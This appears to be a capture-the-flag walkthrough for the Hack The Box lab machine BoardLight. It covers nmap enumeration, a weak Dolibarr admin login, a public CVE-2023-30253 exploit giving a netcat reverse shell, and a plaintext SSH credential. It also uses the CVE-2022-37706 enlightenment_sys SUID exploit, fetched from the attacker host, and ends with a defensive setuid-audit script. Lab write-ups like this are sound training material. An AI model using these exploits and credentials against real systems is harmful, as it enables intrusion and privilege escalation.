
HTB-BoardLight Target Machine Notes

Popularity: 285 / 2024-08-18 23:18:05

BoardLight Target Notes

Overview

HTB's target machine BoardLight

Target machine address: /machines/BoardLight

I. nmap scanning

1) Port scanning

-sT: TCP full-connect scan; --min-rate 10000: send probes at a minimum rate of 10000 per second; -p-: scan all 65535 ports

sudo nmap -sT --min-rate 10000 -p- -o ports 10.10.11.11
Warning: 10.10.11.11 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.11
Host is up (0.23s latency).
Not shown: 41074 closed tcp ports (conn-refused), 24459 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Aug 17 20:10:36 2024 -- 1 IP address (1 host up) scanned in 100.49 seconds

2) Detail Detection

-sT: TCP full-connect scan; -sV: detect the service version on each port; -sC: run the default script set; -O: detect the target operating system

sudo nmap -sT -sV -sC -O -p22,80 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.36s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
|   256 5903dc52873a359934447433783135fb (ECDSA)
|_  256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Sat Aug 17 20:12:43 2024 -- 1 IP address (1 host up) scanned in 44.29 seconds

3) Vulnerable Script Scanning

sudo nmap --script=vuln -o vuln 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.46s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.11
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|_    Form action: 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

# Nmap done at Sat Aug 17 20:16:04 2024 -- 1 IP address (1 host up) scanned in 156.22 seconds

II. Web Penetration

1) Domain Discovery


A domain name is found at the bottom of the page; write it into the /etc/hosts file.

sudo echo "10.10.11.11 " | sudo tee -a /etc/hosts 

Run subdomain brute-forcing and directory brute-forcing against it.

Subdomain brute-forcing finds an htb subdomain; write it into the /etc/hosts file as well.

Visit it.

A CMS login page appears; try the weak password admin:admin.

Log in.


III. Gaining a foothold

Search on Google.

Found Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.

Follow the usage instructions on its GitHub page.

Listen locally on Kali:

nc -lvvp 4444

Run the exploit script:

python3   admin admin 10.10.14.69 4444

The reverse shell connects back successfully.


Locate the configuration file.


Found a set of credentials.

Check which users exist:

ls /home

larissa

SSH credentials: larissa:serverfun2$2023!!

Connect over SSH to get a shell as the regular user.

ssh larissa@10.10.11.11


IV. Privilege escalation to root

find / -perm -4000 -type f 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

Note that enlightenment_sys has a known SUID privilege-escalation vulnerability.

CVE-2022-37706

Download the exploit on Kali, start a PHP web server on port 80, fetch it on the target with wget, and run it to get root.
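As an added defensive example (not part of the original note), a small Python audit that runs the same find(1) command and flags setuid binaries outside a baseline of distribution-shipped ones; the baseline set EXPECTED_SUID and the abbreviated sample listing are constructed here for illustration, so tune the baseline to your own image.

```python
import subprocess
from typing import Iterable, List

# Baseline of setuid binaries a stock Ubuntu 20.04 host is expected to ship.
# Constructed for this example; extend it to match your own build.
EXPECTED_SUID = {
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/sbin/pppd",
    "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/sudo", "/usr/bin/su",
    "/usr/bin/chfn", "/usr/bin/umount", "/usr/bin/gpasswd",
    "/usr/bin/passwd", "/usr/bin/fusermount", "/usr/bin/chsh",
}

# Constructed sample: an abbreviated copy of the listing the note obtained
# on BoardLight with `find / -perm -4000 -type f`.
SAMPLE_LISTING = """\
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/vmware-user-suid-wrapper
"""

def find_suid_binaries() -> List[str]:
    """Run the same find(1) command used in the note and return the paths."""
    proc = subprocess.run(["find", "/", "-perm", "-4000", "-type", "f"],
                          capture_output=True, text=True)
    return [ln.strip() for ln in proc.stdout.splitlines() if ln.strip()]

def unexpected_suid(paths: Iterable[str], expected=EXPECTED_SUID) -> List[str]:
    """Return setuid paths not in the baseline, deduplicated and sorted.
    These are the candidates to review or strip the setuid bit from:
    third-party desktop helpers such as enlightenment_sys, VM tooling, etc."""
    return sorted({p for p in paths if p not in expected})

if __name__ == "__main__":
    for path in unexpected_suid(find_suid_binaries()):
        print("REVIEW: setuid binary outside baseline:", path)
```

Run it as root on a host you administer and feed the review list into your hardening or alerting pipeline; on BoardLight it singles out the four Enlightenment helpers and the VMware wrapper.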


Get the root flag.

Summary

  1. An nmap scan shows that the target machine has ports 22 and 80 open.
  2. Directory and subdomain brute-forcing against the HTTP service on port 80 revealed the Dolibarr CMS, and a Google search turned up the exploit script Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.
  3. Exploiting the CMS vulnerability gave a shell; reading the configuration file revealed the credentials larissa:serverfun2$2023!!, which gave a shell as that user.
  4. The root shell was obtained by exploiting the SUID binary of the Enlightenment desktop management component.